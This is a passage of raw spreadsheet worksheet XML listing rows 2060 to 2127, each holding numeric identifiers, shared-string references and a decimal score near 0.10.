      <c r="C2060" s="2" t="s">
        <v>1891</v>
      </c>
      <c r="D2060" s="2">
        <v>1.0</v>
      </c>
      <c r="E2060" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2060" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2061" ht="15.75" customHeight="1">
      <c r="A2061" s="1">
        <v>26872.0</v>
      </c>
      <c r="B2061" s="2">
        <v>1.9099107E7</v>
      </c>
      <c r="C2061" s="2" t="s">
        <v>1892</v>
      </c>
      <c r="D2061" s="2">
        <v>1.0</v>
      </c>
      <c r="E2061" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2061" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2062" ht="15.75" customHeight="1">
      <c r="A2062" s="1">
        <v>27690.0</v>
      </c>
      <c r="B2062" s="2">
        <v>2.2991854E7</v>
      </c>
      <c r="C2062" s="2" t="s">
        <v>1893</v>
      </c>
      <c r="D2062" s="2">
        <v>1.0</v>
      </c>
      <c r="E2062" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2062" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2063" ht="15.75" customHeight="1">
      <c r="A2063" s="1">
        <v>27757.0</v>
      </c>
      <c r="B2063" s="2">
        <v>2.3106085E7</v>
      </c>
      <c r="C2063" s="2" t="s">
        <v>1894</v>
      </c>
      <c r="D2063" s="2">
        <v>1.0</v>
      </c>
      <c r="E2063" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2063" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2064" ht="15.75" customHeight="1">
      <c r="A2064" s="1">
        <v>28270.0</v>
      </c>
      <c r="B2064" s="2">
        <v>2.5377527E7</v>
      </c>
      <c r="C2064" s="2" t="s">
        <v>1895</v>
      </c>
      <c r="D2064" s="2">
        <v>1.0</v>
      </c>
      <c r="E2064" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2064" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2065" ht="15.75" customHeight="1">
      <c r="A2065" s="1">
        <v>29658.0</v>
      </c>
      <c r="B2065" s="2">
        <v>3.3888731E7</v>
      </c>
      <c r="C2065" s="2" t="s">
        <v>1896</v>
      </c>
      <c r="D2065" s="2">
        <v>1.0</v>
      </c>
      <c r="E2065" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2065" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2066" ht="15.75" customHeight="1">
      <c r="A2066" s="1">
        <v>30461.0</v>
      </c>
      <c r="B2066" s="2">
        <v>3.9492736E7</v>
      </c>
      <c r="C2066" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="D2066" s="2">
        <v>1.0</v>
      </c>
      <c r="E2066" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2066" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2067" ht="15.75" customHeight="1">
      <c r="A2067" s="1">
        <v>31049.0</v>
      </c>
      <c r="B2067" s="2">
        <v>4.7946171E7</v>
      </c>
      <c r="C2067" s="2" t="s">
        <v>1898</v>
      </c>
      <c r="D2067" s="2">
        <v>1.0</v>
      </c>
      <c r="E2067" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2067" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2068" ht="15.75" customHeight="1">
      <c r="A2068" s="1">
        <v>31398.0</v>
      </c>
      <c r="B2068" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C2068" s="2" t="s">
        <v>1899</v>
      </c>
      <c r="D2068" s="2">
        <v>1.0</v>
      </c>
      <c r="E2068" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2068" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2069" ht="15.75" customHeight="1">
      <c r="A2069" s="1">
        <v>32805.0</v>
      </c>
      <c r="B2069" s="2">
        <v>6172983.0</v>
      </c>
      <c r="C2069" s="2" t="s">
        <v>1900</v>
      </c>
      <c r="D2069" s="2">
        <v>1.0</v>
      </c>
      <c r="E2069" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2069" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2070" ht="15.75" customHeight="1">
      <c r="A2070" s="1">
        <v>33868.0</v>
      </c>
      <c r="B2070" s="2">
        <v>9079370.0</v>
      </c>
      <c r="C2070" s="2" t="s">
        <v>1901</v>
      </c>
      <c r="D2070" s="2">
        <v>1.0</v>
      </c>
      <c r="E2070" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2070" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2071" ht="15.75" customHeight="1">
      <c r="A2071" s="1">
        <v>4786.0</v>
      </c>
      <c r="B2071" s="2">
        <v>4.3467595E7</v>
      </c>
      <c r="C2071" s="2" t="s">
        <v>1902</v>
      </c>
      <c r="D2071" s="2">
        <v>1.0</v>
      </c>
      <c r="E2071" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2071" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2072" ht="15.75" customHeight="1">
      <c r="A2072" s="1">
        <v>5475.0</v>
      </c>
      <c r="B2072" s="2">
        <v>4.5716714E7</v>
      </c>
      <c r="C2072" s="2" t="s">
        <v>1903</v>
      </c>
      <c r="D2072" s="2">
        <v>1.0</v>
      </c>
      <c r="E2072" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2072" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2073" ht="15.75" customHeight="1">
      <c r="A2073" s="1">
        <v>9603.0</v>
      </c>
      <c r="B2073" s="2">
        <v>5.6150125E7</v>
      </c>
      <c r="C2073" s="2" t="s">
        <v>1904</v>
      </c>
      <c r="D2073" s="2">
        <v>1.0</v>
      </c>
      <c r="E2073" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2073" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2074" ht="15.75" customHeight="1">
      <c r="A2074" s="1">
        <v>16626.0</v>
      </c>
      <c r="B2074" s="2">
        <v>4.7063876E7</v>
      </c>
      <c r="C2074" s="2" t="s">
        <v>1905</v>
      </c>
      <c r="D2074" s="2">
        <v>1.0</v>
      </c>
      <c r="E2074" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2074" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2075" ht="15.75" customHeight="1">
      <c r="A2075" s="1">
        <v>25312.0</v>
      </c>
      <c r="B2075" s="2">
        <v>1.3432386E7</v>
      </c>
      <c r="C2075" s="2" t="s">
        <v>1906</v>
      </c>
      <c r="D2075" s="2">
        <v>1.0</v>
      </c>
      <c r="E2075" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2075" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2076" ht="15.75" customHeight="1">
      <c r="A2076" s="1">
        <v>26129.0</v>
      </c>
      <c r="B2076" s="2">
        <v>1.593344E7</v>
      </c>
      <c r="C2076" s="2" t="s">
        <v>1907</v>
      </c>
      <c r="D2076" s="2">
        <v>1.0</v>
      </c>
      <c r="E2076" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2076" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2077" ht="15.75" customHeight="1">
      <c r="A2077" s="1">
        <v>30626.0</v>
      </c>
      <c r="B2077" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C2077" s="2" t="s">
        <v>1908</v>
      </c>
      <c r="D2077" s="2">
        <v>1.0</v>
      </c>
      <c r="E2077" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2077" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2078" ht="15.75" customHeight="1">
      <c r="A2078" s="1">
        <v>31827.0</v>
      </c>
      <c r="B2078" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C2078" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="D2078" s="2">
        <v>1.0</v>
      </c>
      <c r="E2078" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2078" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2079" ht="15.75" customHeight="1">
      <c r="A2079" s="1">
        <v>33385.0</v>
      </c>
      <c r="B2079" s="2">
        <v>7652284.0</v>
      </c>
      <c r="C2079" s="2" t="s">
        <v>1910</v>
      </c>
      <c r="D2079" s="2">
        <v>1.0</v>
      </c>
      <c r="E2079" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2079" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="2080" ht="15.75" customHeight="1">
      <c r="A2080" s="1">
        <v>2333.0</v>
      </c>
      <c r="B2080" s="2">
        <v>3.2960854E7</v>
      </c>
      <c r="C2080" s="2" t="s">
        <v>1911</v>
      </c>
      <c r="D2080" s="2">
        <v>1.0</v>
      </c>
      <c r="E2080" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2080" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2081" ht="15.75" customHeight="1">
      <c r="A2081" s="1">
        <v>6251.0</v>
      </c>
      <c r="B2081" s="2">
        <v>4.8105197E7</v>
      </c>
      <c r="C2081" s="2" t="s">
        <v>1912</v>
      </c>
      <c r="D2081" s="2">
        <v>1.0</v>
      </c>
      <c r="E2081" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2081" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2082" ht="15.75" customHeight="1">
      <c r="A2082" s="1">
        <v>8931.0</v>
      </c>
      <c r="B2082" s="2">
        <v>5.4849343E7</v>
      </c>
      <c r="C2082" s="2" t="s">
        <v>1913</v>
      </c>
      <c r="D2082" s="2">
        <v>1.0</v>
      </c>
      <c r="E2082" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2082" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2083" ht="15.75" customHeight="1">
      <c r="A2083" s="1">
        <v>9622.0</v>
      </c>
      <c r="B2083" s="2">
        <v>5.6204261E7</v>
      </c>
      <c r="C2083" s="2" t="s">
        <v>1914</v>
      </c>
      <c r="D2083" s="2">
        <v>1.0</v>
      </c>
      <c r="E2083" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2083" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2084" ht="15.75" customHeight="1">
      <c r="A2084" s="1">
        <v>11797.0</v>
      </c>
      <c r="B2084" s="2">
        <v>2.4377364E7</v>
      </c>
      <c r="C2084" s="2" t="s">
        <v>1915</v>
      </c>
      <c r="D2084" s="2">
        <v>1.0</v>
      </c>
      <c r="E2084" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2084" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2085" ht="15.75" customHeight="1">
      <c r="A2085" s="1">
        <v>19736.0</v>
      </c>
      <c r="B2085" s="2">
        <v>5.667579E7</v>
      </c>
      <c r="C2085" s="2" t="s">
        <v>1916</v>
      </c>
      <c r="D2085" s="2">
        <v>1.0</v>
      </c>
      <c r="E2085" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2085" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2086" ht="15.75" customHeight="1">
      <c r="A2086" s="1">
        <v>20224.0</v>
      </c>
      <c r="B2086" s="2">
        <v>1.078103E7</v>
      </c>
      <c r="C2086" s="2" t="s">
        <v>1917</v>
      </c>
      <c r="D2086" s="2">
        <v>1.0</v>
      </c>
      <c r="E2086" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2086" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2087" ht="15.75" customHeight="1">
      <c r="A2087" s="1">
        <v>20551.0</v>
      </c>
      <c r="B2087" s="2">
        <v>1.3382817E7</v>
      </c>
      <c r="C2087" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="D2087" s="2">
        <v>1.0</v>
      </c>
      <c r="E2087" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2087" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2088" ht="15.75" customHeight="1">
      <c r="A2088" s="1">
        <v>24233.0</v>
      </c>
      <c r="B2088" s="2">
        <v>1.0462108E7</v>
      </c>
      <c r="C2088" s="2" t="s">
        <v>1919</v>
      </c>
      <c r="D2088" s="2">
        <v>1.0</v>
      </c>
      <c r="E2088" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2088" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2089" ht="15.75" customHeight="1">
      <c r="A2089" s="1">
        <v>25649.0</v>
      </c>
      <c r="B2089" s="2">
        <v>1.452297E7</v>
      </c>
      <c r="C2089" s="2" t="s">
        <v>1920</v>
      </c>
      <c r="D2089" s="2">
        <v>1.0</v>
      </c>
      <c r="E2089" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2089" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2090" ht="15.75" customHeight="1">
      <c r="A2090" s="1">
        <v>26409.0</v>
      </c>
      <c r="B2090" s="2">
        <v>1.7088168E7</v>
      </c>
      <c r="C2090" s="2" t="s">
        <v>1921</v>
      </c>
      <c r="D2090" s="2">
        <v>1.0</v>
      </c>
      <c r="E2090" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2090" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2091" ht="15.75" customHeight="1">
      <c r="A2091" s="1">
        <v>29829.0</v>
      </c>
      <c r="B2091" s="2">
        <v>3.5345141E7</v>
      </c>
      <c r="C2091" s="2" t="s">
        <v>1922</v>
      </c>
      <c r="D2091" s="2">
        <v>1.0</v>
      </c>
      <c r="E2091" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2091" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2092" ht="15.75" customHeight="1">
      <c r="A2092" s="1">
        <v>30656.0</v>
      </c>
      <c r="B2092" s="2">
        <v>4.2024021E7</v>
      </c>
      <c r="C2092" s="2" t="s">
        <v>1923</v>
      </c>
      <c r="D2092" s="2">
        <v>1.0</v>
      </c>
      <c r="E2092" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2092" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="2093" ht="15.75" customHeight="1">
      <c r="A2093" s="1">
        <v>23010.0</v>
      </c>
      <c r="B2093" s="2">
        <v>4.9842317E7</v>
      </c>
      <c r="C2093" s="2" t="s">
        <v>1924</v>
      </c>
      <c r="D2093" s="2">
        <v>1.0</v>
      </c>
      <c r="E2093" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2093" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="2094" ht="15.75" customHeight="1">
      <c r="A2094" s="1">
        <v>29343.0</v>
      </c>
      <c r="B2094" s="2">
        <v>3.1424024E7</v>
      </c>
      <c r="C2094" s="2" t="s">
        <v>1925</v>
      </c>
      <c r="D2094" s="2">
        <v>1.0</v>
      </c>
      <c r="E2094" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2094" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="2095" ht="15.75" customHeight="1">
      <c r="A2095" s="1">
        <v>32713.0</v>
      </c>
      <c r="B2095" s="2">
        <v>5959136.0</v>
      </c>
      <c r="C2095" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="D2095" s="2">
        <v>1.0</v>
      </c>
      <c r="E2095" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2095" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="2096" ht="15.75" customHeight="1">
      <c r="A2096" s="1">
        <v>17152.0</v>
      </c>
      <c r="B2096" s="2">
        <v>4.8854938E7</v>
      </c>
      <c r="C2096" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="D2096" s="2">
        <v>1.0</v>
      </c>
      <c r="E2096" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2096" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="2097" ht="15.75" customHeight="1">
      <c r="A2097" s="1">
        <v>24818.0</v>
      </c>
      <c r="B2097" s="2">
        <v>1.208815E7</v>
      </c>
      <c r="C2097" s="2" t="s">
        <v>1928</v>
      </c>
      <c r="D2097" s="2">
        <v>1.0</v>
      </c>
      <c r="E2097" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2097" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="2098" ht="15.75" customHeight="1">
      <c r="A2098" s="1">
        <v>26167.0</v>
      </c>
      <c r="B2098" s="2">
        <v>1.6098932E7</v>
      </c>
      <c r="C2098" s="2" t="s">
        <v>1855</v>
      </c>
      <c r="D2098" s="2">
        <v>1.0</v>
      </c>
      <c r="E2098" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2098" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="2099" ht="15.75" customHeight="1">
      <c r="A2099" s="1">
        <v>26900.0</v>
      </c>
      <c r="B2099" s="2">
        <v>1.9283007E7</v>
      </c>
      <c r="C2099" s="2" t="s">
        <v>1929</v>
      </c>
      <c r="D2099" s="2">
        <v>1.0</v>
      </c>
      <c r="E2099" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2099" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="2100" ht="15.75" customHeight="1">
      <c r="A2100" s="1">
        <v>27042.0</v>
      </c>
      <c r="B2100" s="2">
        <v>2.0199311E7</v>
      </c>
      <c r="C2100" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="D2100" s="2">
        <v>1.0</v>
      </c>
      <c r="E2100" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2100" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="2101" ht="15.75" customHeight="1">
      <c r="A2101" s="1">
        <v>33461.0</v>
      </c>
      <c r="B2101" s="2">
        <v>7933782.0</v>
      </c>
      <c r="C2101" s="2" t="s">
        <v>1930</v>
      </c>
      <c r="D2101" s="2">
        <v>1.0</v>
      </c>
      <c r="E2101" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2101" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="2102" ht="15.75" customHeight="1">
      <c r="A2102" s="1">
        <v>15599.0</v>
      </c>
      <c r="B2102" s="2">
        <v>4.3478737E7</v>
      </c>
      <c r="C2102" s="2" t="s">
        <v>1931</v>
      </c>
      <c r="D2102" s="2">
        <v>1.0</v>
      </c>
      <c r="E2102" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2102" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="2103" ht="15.75" customHeight="1">
      <c r="A2103" s="1">
        <v>24813.0</v>
      </c>
      <c r="B2103" s="2">
        <v>1.2058446E7</v>
      </c>
      <c r="C2103" s="2" t="s">
        <v>1932</v>
      </c>
      <c r="D2103" s="2">
        <v>1.0</v>
      </c>
      <c r="E2103" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2103" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="2104" ht="15.75" customHeight="1">
      <c r="A2104" s="1">
        <v>28642.0</v>
      </c>
      <c r="B2104" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C2104" s="2" t="s">
        <v>1933</v>
      </c>
      <c r="D2104" s="2">
        <v>1.0</v>
      </c>
      <c r="E2104" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2104" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="2105" ht="15.75" customHeight="1">
      <c r="A2105" s="1">
        <v>28706.0</v>
      </c>
      <c r="B2105" s="2">
        <v>2.7761072E7</v>
      </c>
      <c r="C2105" s="2" t="s">
        <v>1546</v>
      </c>
      <c r="D2105" s="2">
        <v>1.0</v>
      </c>
      <c r="E2105" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2105" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="2106" ht="15.75" customHeight="1">
      <c r="A2106" s="1">
        <v>32095.0</v>
      </c>
      <c r="B2106" s="2">
        <v>5399868.0</v>
      </c>
      <c r="C2106" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="D2106" s="2">
        <v>1.0</v>
      </c>
      <c r="E2106" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2106" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="2107" ht="15.75" customHeight="1">
      <c r="A2107" s="1">
        <v>32158.0</v>
      </c>
      <c r="B2107" s="2">
        <v>5.4341297E7</v>
      </c>
      <c r="C2107" s="2" t="s">
        <v>1935</v>
      </c>
      <c r="D2107" s="2">
        <v>1.0</v>
      </c>
      <c r="E2107" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2107" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="2108" ht="15.75" customHeight="1">
      <c r="A2108" s="1">
        <v>1047.0</v>
      </c>
      <c r="B2108" s="2">
        <v>2.3381872E7</v>
      </c>
      <c r="C2108" s="2" t="s">
        <v>1936</v>
      </c>
      <c r="D2108" s="2">
        <v>1.0</v>
      </c>
      <c r="E2108" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2108" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="2109" ht="15.75" customHeight="1">
      <c r="A2109" s="1">
        <v>23370.0</v>
      </c>
      <c r="B2109" s="2">
        <v>5.5247273E7</v>
      </c>
      <c r="C2109" s="2" t="s">
        <v>1937</v>
      </c>
      <c r="D2109" s="2">
        <v>1.0</v>
      </c>
      <c r="E2109" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2109" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="2110" ht="15.75" customHeight="1">
      <c r="A2110" s="1">
        <v>17879.0</v>
      </c>
      <c r="B2110" s="2">
        <v>5.1034321E7</v>
      </c>
      <c r="C2110" s="2" t="s">
        <v>1938</v>
      </c>
      <c r="D2110" s="2">
        <v>1.0</v>
      </c>
      <c r="E2110" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2110" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="2111" ht="15.75" customHeight="1">
      <c r="A2111" s="1">
        <v>20443.0</v>
      </c>
      <c r="B2111" s="2">
        <v>1.2417227E7</v>
      </c>
      <c r="C2111" s="2" t="s">
        <v>1939</v>
      </c>
      <c r="D2111" s="2">
        <v>1.0</v>
      </c>
      <c r="E2111" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2111" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="2112" ht="15.75" customHeight="1">
      <c r="A2112" s="1">
        <v>22919.0</v>
      </c>
      <c r="B2112" s="2">
        <v>4.8337243E7</v>
      </c>
      <c r="C2112" s="2" t="s">
        <v>1940</v>
      </c>
      <c r="D2112" s="2">
        <v>1.0</v>
      </c>
      <c r="E2112" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2112" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="2113" ht="15.75" customHeight="1">
      <c r="A2113" s="1">
        <v>23272.0</v>
      </c>
      <c r="B2113" s="2">
        <v>5.3425745E7</v>
      </c>
      <c r="C2113" s="2" t="s">
        <v>1941</v>
      </c>
      <c r="D2113" s="2">
        <v>1.0</v>
      </c>
      <c r="E2113" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2113" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="2114" ht="15.75" customHeight="1">
      <c r="A2114" s="1">
        <v>28020.0</v>
      </c>
      <c r="B2114" s="2">
        <v>2.4380307E7</v>
      </c>
      <c r="C2114" s="2" t="s">
        <v>1942</v>
      </c>
      <c r="D2114" s="2">
        <v>1.0</v>
      </c>
      <c r="E2114" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2114" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="2115" ht="15.75" customHeight="1">
      <c r="A2115" s="1">
        <v>29125.0</v>
      </c>
      <c r="B2115" s="2">
        <v>3.0505708E7</v>
      </c>
      <c r="C2115" s="2" t="s">
        <v>1943</v>
      </c>
      <c r="D2115" s="2">
        <v>1.0</v>
      </c>
      <c r="E2115" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2115" s="2">
        <v>0.1049382716049383</v>
      </c>
    </row>
    <row r="2116" ht="15.75" customHeight="1">
      <c r="A2116" s="1">
        <v>12525.0</v>
      </c>
      <c r="B2116" s="2">
        <v>2.9713795E7</v>
      </c>
      <c r="C2116" s="2" t="s">
        <v>1944</v>
      </c>
      <c r="D2116" s="2">
        <v>1.0</v>
      </c>
      <c r="E2116" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2116" s="2">
        <v>0.1048387096774193</v>
      </c>
    </row>
    <row r="2117" ht="15.75" customHeight="1">
      <c r="A2117" s="1">
        <v>14684.0</v>
      </c>
      <c r="B2117" s="2">
        <v>4.0506538E7</v>
      </c>
      <c r="C2117" s="2" t="s">
        <v>1945</v>
      </c>
      <c r="D2117" s="2">
        <v>1.0</v>
      </c>
      <c r="E2117" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2117" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="2118" ht="15.75" customHeight="1">
      <c r="A2118" s="1">
        <v>20664.0</v>
      </c>
      <c r="B2118" s="2">
        <v>1.4339664E7</v>
      </c>
      <c r="C2118" s="2" t="s">
        <v>1946</v>
      </c>
      <c r="D2118" s="2">
        <v>1.0</v>
      </c>
      <c r="E2118" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2118" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="2119" ht="15.75" customHeight="1">
      <c r="A2119" s="1">
        <v>24542.0</v>
      </c>
      <c r="B2119" s="2">
        <v>1.1218858E7</v>
      </c>
      <c r="C2119" s="2" t="s">
        <v>1947</v>
      </c>
      <c r="D2119" s="2">
        <v>1.0</v>
      </c>
      <c r="E2119" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2119" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="2120" ht="15.75" customHeight="1">
      <c r="A2120" s="1">
        <v>29501.0</v>
      </c>
      <c r="B2120" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C2120" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="D2120" s="2">
        <v>1.0</v>
      </c>
      <c r="E2120" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2120" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="2121" ht="15.75" customHeight="1">
      <c r="A2121" s="1">
        <v>552.0</v>
      </c>
      <c r="B2121" s="2">
        <v>1.8794344E7</v>
      </c>
      <c r="C2121" s="2" t="s">
        <v>1949</v>
      </c>
      <c r="D2121" s="2">
        <v>1.0</v>
      </c>
      <c r="E2121" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2121" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2122" ht="15.75" customHeight="1">
      <c r="A2122" s="1">
        <v>872.0</v>
      </c>
      <c r="B2122" s="2">
        <v>2.1869936E7</v>
      </c>
      <c r="C2122" s="2" t="s">
        <v>1950</v>
      </c>
      <c r="D2122" s="2">
        <v>1.0</v>
      </c>
      <c r="E2122" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2122" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2123" ht="15.75" customHeight="1">
      <c r="A2123" s="1">
        <v>4769.0</v>
      </c>
      <c r="B2123" s="2">
        <v>4.3435145E7</v>
      </c>
      <c r="C2123" s="2" t="s">
        <v>1951</v>
      </c>
      <c r="D2123" s="2">
        <v>1.0</v>
      </c>
      <c r="E2123" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2123" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2124" ht="15.75" customHeight="1">
      <c r="A2124" s="1">
        <v>5125.0</v>
      </c>
      <c r="B2124" s="2">
        <v>4.4577224E7</v>
      </c>
      <c r="C2124" s="2" t="s">
        <v>1952</v>
      </c>
      <c r="D2124" s="2">
        <v>1.0</v>
      </c>
      <c r="E2124" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2124" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2125" ht="15.75" customHeight="1">
      <c r="A2125" s="1">
        <v>6398.0</v>
      </c>
      <c r="B2125" s="2">
        <v>4.8471126E7</v>
      </c>
      <c r="C2125" s="2" t="s">
        <v>1953</v>
      </c>
      <c r="D2125" s="2">
        <v>1.0</v>
      </c>
      <c r="E2125" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2125" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2126" ht="15.75" customHeight="1">
      <c r="A2126" s="1">
        <v>8581.0</v>
      </c>
      <c r="B2126" s="2">
        <v>5.4220198E7</v>
      </c>
      <c r="C2126" s="2" t="s">
        <v>1954</v>
      </c>
      <c r="D2126" s="2">
        <v>1.0</v>
      </c>
      <c r="E2126" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2126" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2127" ht="15.75" customHeight="1">
      <c r="A2127" s="1">
        <v>14333.0</v>
      </c>
      <c r="B2127" s="2">
        <v>3.8761844E7</v>
      </c>
      <c r="C2127" s="2" t="s">
        <v>1955</v>
      </c>
      <c r="D2127" s="2">
        <v>1.0</v>
      </c>
      <c r="E2127" s="3" t="s">
